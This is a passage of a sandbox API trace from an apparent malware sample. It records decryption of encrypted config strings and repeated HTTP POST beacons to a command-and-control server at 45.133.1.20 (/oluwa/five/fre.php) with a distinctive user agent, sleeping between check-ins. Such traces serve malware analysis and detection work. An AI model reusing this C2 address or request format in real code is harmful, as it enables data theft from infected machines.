(lpLibFileName="user32") returned 0x75640000 [0309.898] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0309.898] GetProcessHeap () returned 0x6a0000 [0309.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dfc28 [0309.898] GetProcessHeap () returned 0x6a0000 [0309.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0309.899] GetProcessHeap () returned 0x6a0000 [0309.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0309.899] GetProcessHeap () returned 0x6a0000 [0309.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0309.900] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0309.901] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0309.901] GetProcessHeap () returned 0x6a0000 [0309.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0309.901] GetProcessHeap () returned 0x6a0000 [0309.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0309.902] send (s=0xbc4, buf=0x6bd460*, len=242, flags=0) returned 242 [0309.905] send (s=0xbc4, buf=0x6bb998*, len=159, flags=0) returned 159 [0309.905] GetProcessHeap () returned 0x6a0000 [0309.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0309.905] recv (in: s=0xbc4, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0309.977] GetProcessHeap () returned 0x6a0000 [0309.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0309.978] GetProcessHeap () returned 0x6a0000 [0309.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0309.978] GetProcessHeap () returned 0x6a0000 [0309.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dfc28 | out: hHeap=0x6a0000) returned 1 [0309.979] GetProcessHeap () returned 0x6a0000 [0309.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0309.979] closesocket (s=0xbc4) returned 0 [0309.980] GetProcessHeap () returned 0x6a0000 [0309.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0309.980] GetProcessHeap () returned 0x6a0000 [0309.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0309.983] GetProcessHeap () returned 0x6a0000 [0309.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0309.983] GetProcessHeap () returned 0x6a0000 [0309.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0309.984] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1904) returned 0xbc4 [0309.986] Sleep (dwMilliseconds=0xea60) [0309.987] GetProcessHeap () returned 0x6a0000 [0309.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0309.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.989] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0309.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.996] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0310.094] GetProcessHeap () returned 0x6a0000 [0310.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0310.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.095] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0310.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.097] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0310.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.101] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0310.101] GetProcessHeap () returned 0x6a0000 [0310.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0310.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.157] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0310.159] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.161] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0310.162] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.162] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0310.162] GetProcessHeap () returned 0x6a0000 [0310.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0310.163] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.163] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0310.164] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.164] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0310.165] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.165] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0310.166] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.166] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0310.166] GetProcessHeap () returned 0x6a0000 [0310.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0310.167] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0310.167] GetProcessHeap () returned 0x6a0000 [0310.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0310.167] GetProcessHeap () returned 0x6a0000 [0310.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0310.168] GetProcessHeap () returned 0x6a0000 [0310.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0310.168] GetProcessHeap () returned 0x6a0000 [0310.168] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0310.169] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.169] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0310.175] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.175] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0310.185] GetProcessHeap () returned 0x6a0000 [0310.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0310.186] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.186] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0310.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.187] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0310.198] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.198] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0310.198] GetProcessHeap () returned 0x6a0000 [0310.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0310.200] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.200] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0310.201] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.202] CryptDestroyKey (hKey=0x6ad020) returned 1 [0310.205] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.206] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0310.206] GetProcessHeap () returned 0x6a0000 [0310.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0310.208] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.208] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0310.209] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.210] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0310.211] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.211] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0310.212] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.213] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0310.213] GetProcessHeap () returned 0x6a0000 [0310.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0310.213] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0310.213] GetProcessHeap () returned 0x6a0000 [0310.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa40 [0310.213] socket (af=2, type=1, protocol=6) returned 0xbc8 [0310.214] connect (s=0xbc8, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0310.241] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0310.241] GetProcessHeap () returned 0x6a0000 [0310.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0310.242] GetProcessHeap () returned 0x6a0000 [0310.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0310.242] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0310.244] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0310.244] GetProcessHeap () returned 0x6a0000 [0310.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df1a8 [0310.244] GetProcessHeap () returned 0x6a0000 [0310.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0310.245] GetProcessHeap () returned 0x6a0000 [0310.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0310.245] GetProcessHeap () returned 0x6a0000 [0310.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0310.245] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0310.246] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0310.247] GetProcessHeap () returned 0x6a0000 [0310.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0310.247] GetProcessHeap () returned 0x6a0000 [0310.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0310.247] send (s=0xbc8, buf=0x6bd460*, len=242, flags=0) returned 242 [0310.248] send (s=0xbc8, buf=0x6bb998*, len=159, flags=0) returned 159 [0310.248] GetProcessHeap () returned 0x6a0000 [0310.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0310.248] recv (in: s=0xbc8, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0310.321] GetProcessHeap () returned 0x6a0000 [0310.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0310.322] GetProcessHeap () returned 0x6a0000 [0310.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0310.323] GetProcessHeap () returned 0x6a0000 [0310.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df1a8 | out: hHeap=0x6a0000) returned 1 [0310.323] GetProcessHeap () returned 0x6a0000 [0310.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0310.324] closesocket (s=0xbc8) returned 0 [0310.324] GetProcessHeap () returned 0x6a0000 [0310.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa40 | out: hHeap=0x6a0000) returned 1 [0310.324] GetProcessHeap () returned 0x6a0000 [0310.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0310.325] GetProcessHeap () returned 0x6a0000 [0310.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0310.325] GetProcessHeap () returned 0x6a0000 [0310.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0310.325] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1908) returned 0xbc8 [0310.327] Sleep (dwMilliseconds=0xea60) [0310.331] GetProcessHeap () returned 0x6a0000 [0310.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0310.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.332] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0310.337] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.338] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0310.347] GetProcessHeap () returned 0x6a0000 [0310.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0310.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.348] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0310.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.349] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0310.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.350] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0310.350] GetProcessHeap () returned 0x6a0000 [0310.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0310.351] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.351] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0310.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.353] CryptDestroyKey (hKey=0x6ad560) returned 1 [0310.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.354] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0310.354] GetProcessHeap () returned 0x6a0000 [0310.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0310.355] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.355] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0310.356] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.357] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0310.357] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.358] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0310.359] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.367] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0310.367] GetProcessHeap () returned 0x6a0000 [0310.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0310.367] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0310.367] GetProcessHeap () returned 0x6a0000 [0310.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0310.368] GetProcessHeap () returned 0x6a0000 [0310.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0310.368] GetProcessHeap () returned 0x6a0000 [0310.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0310.368] GetProcessHeap () returned 0x6a0000 [0310.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0310.369] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.370] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0310.378] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.378] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0310.387] GetProcessHeap () returned 0x6a0000 [0310.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0310.388] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.388] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0310.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.389] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0310.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.390] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0310.390] GetProcessHeap () returned 0x6a0000 [0310.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0310.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.392] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0310.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.393] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0310.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.395] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0310.395] GetProcessHeap () returned 0x6a0000 [0310.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0310.396] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.396] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0310.397] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.397] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0310.398] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.398] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0310.399] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.399] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0310.399] GetProcessHeap () returned 0x6a0000 [0310.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0310.399] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0310.399] GetProcessHeap () returned 0x6a0000 [0310.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0310.399] socket (af=2, type=1, protocol=6) returned 0xbcc [0310.400] connect (s=0xbcc, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0310.426] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0310.426] GetProcessHeap () returned 0x6a0000 [0310.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0310.426] GetProcessHeap () returned 0x6a0000 [0310.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0310.427] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0310.429] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0310.429] GetProcessHeap () returned 0x6a0000 [0310.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df3e8 [0310.429] GetProcessHeap () returned 0x6a0000 [0310.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0310.430] GetProcessHeap () returned 0x6a0000 [0310.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 